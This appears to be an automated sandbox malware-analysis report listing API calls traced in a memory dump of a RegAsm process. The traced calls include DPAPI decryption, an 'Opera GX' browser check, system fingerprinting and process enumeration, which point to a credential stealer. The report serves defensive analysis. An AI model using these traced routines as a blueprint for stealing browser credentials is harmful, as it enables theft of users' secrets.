                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B9C,?,?,?,00425B97,?), ref: 004065A7
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B9B), ref: 0040661F
                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                Strings
                                                                                • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                • API String ID: 757424748-4027016359
                                                                                • Opcode ID: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                • Instruction ID: 8db632add1ead28395c1f5c726ee2788193d5f270b99ec1c59b0dc1cdd27b91c
                                                                                • Opcode Fuzzy Hash: b1ec59224834b8f79ed32a038f4b7da38d4618f543a9ad0f1e6d2df5f849b41d
                                                                                • Instruction Fuzzy Hash: C3617270801544EECB25EBA4D915BEDBBB5EB29304F10507EE406736E2DB381A09CF69
                                                                                Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                  • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                  • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                  • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                • memcmp.MSVCRT ref: 0040C21C
                                                                                  • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                  • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                  • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                • String ID: $DPAPI
                                                                                • API String ID: 2477620391-1819349886
                                                                                • Opcode ID: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                • Instruction ID: 7c90c9c52161514f2ce6f88b14c0e6cf6dad8cdca0aeae51f6cfd95d0e4443f7
                                                                                • Opcode Fuzzy Hash: 548af4ef5a68c1d15bd34a1c9f3b88a4916ae1bc9e092e19947f3fc684f09504
                                                                                • Instruction Fuzzy Hash: EA21A272D00109ABCF10ABE5CD429EFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                Function 0041064B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000,?), ref: 00410694
                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624,00000000), ref: 004106B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID: Windows 11
                                                                                • API String ID: 3676486918-2517555085
                                                                                • Opcode ID: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                • Instruction ID: 81a682fe0d96866a8c385725fbf1601ecc6145704a13890b4f9ee07a06a14e80
                                                                                • Opcode Fuzzy Hash: 7cca10c1b5c7dd35db0d4f8c6a920e7d0fee12f9d646c557380bc34a9577cd99
                                                                                • Instruction Fuzzy Hash: F0F06879640215FBEB105BD1DD0AF9A7A7EEB45B04F101075FB01D51A0D7F499509724
                                                                                Function 0040FB50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,00426624), ref: 0040FB6B
                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocOpenProcessQueryValue
                                                                                • String ID: CurrentBuildNumber
                                                                                • API String ID: 3676486918-1022791448
                                                                                • Opcode ID: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                • Instruction ID: 28640ec94ffd33d2c44419ba2cf0af880b9d8ee060d027bd97fbaf1b7c2936ad
                                                                                • Opcode Fuzzy Hash: 5b1574023f8c3e93d255d4511c3bb41a2e12e83297ccb6591afc91b84a13fdcf
                                                                                • Instruction Fuzzy Hash: C9F03076240214FBFB119BD1DC0BFAE7A7DEB45B04F101069F701A50A0D7B569409B28
                                                                                Function 0040913E Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409143
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425E0C,?,?,?,00425BF3,00000000), ref: 0040921D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                • String ID:
                                                                                • API String ID: 3423466546-0
                                                                                • Opcode ID: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                • Instruction ID: 6a8509654029ecf25c00575de94dff416ad1a9dfa5c75539aeb624d08fba698f
                                                                                • Opcode Fuzzy Hash: bfef4180e8e3876148cd5ce538e57db1d27edee7cd8a81a86ac191b16032c8c9
                                                                                • Instruction Fuzzy Hash: 61B15A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                Function 6C7CC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7CC947
                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C7CC969
                                                                                • GetSystemInfo.KERNEL32(?), ref: 6C7CC9A9
                                                                                • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C7CC9C8
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C7CC9E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocInfoSystem$Free
                                                                                • String ID:
                                                                                • API String ID: 4191843772-0
                                                                                • Opcode ID: 547fdb908eb1fcb43b14cc681dfa50b4b88da8cb6654bf3a577afe3b1d2569e0
                                                                                • Instruction ID: 1f29be7d271e608a33a4eaa14eda7f890e0e0b573857a73efe94a79a068fdc42
                                                                                • Opcode Fuzzy Hash: 547fdb908eb1fcb43b14cc681dfa50b4b88da8cb6654bf3a577afe3b1d2569e0
                                                                                • Instruction Fuzzy Hash: 9C2128727416156FDB30AAA4DD8CBAE7779AF46309F501539F90BA7680DB205C40C7D1
                                                                                Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004102C8
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                • String ID:
                                                                                • API String ID: 599723951-0
                                                                                • Opcode ID: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                • Instruction ID: 88ec815686b26defa928efc06cad103335915502f2ebb48a4a43328a16f3c0f2
                                                                                • Opcode Fuzzy Hash: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
                                                                                • Instruction Fuzzy Hash: 922109B1A00118ABCB10EFA5C955AEEFBB9AF98344F50407EE415F3291CB785A488B65
                                                                                Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004024F0
                                                                                  • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                  • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                  • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                  • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                • memset.MSVCRT ref: 00402540
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                • String ID:
                                                                                • API String ID: 3248666761-0
                                                                                • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                Function 0040D6BB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00425C1E,00425C1B,?,?,?), ref: 0040D70A
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
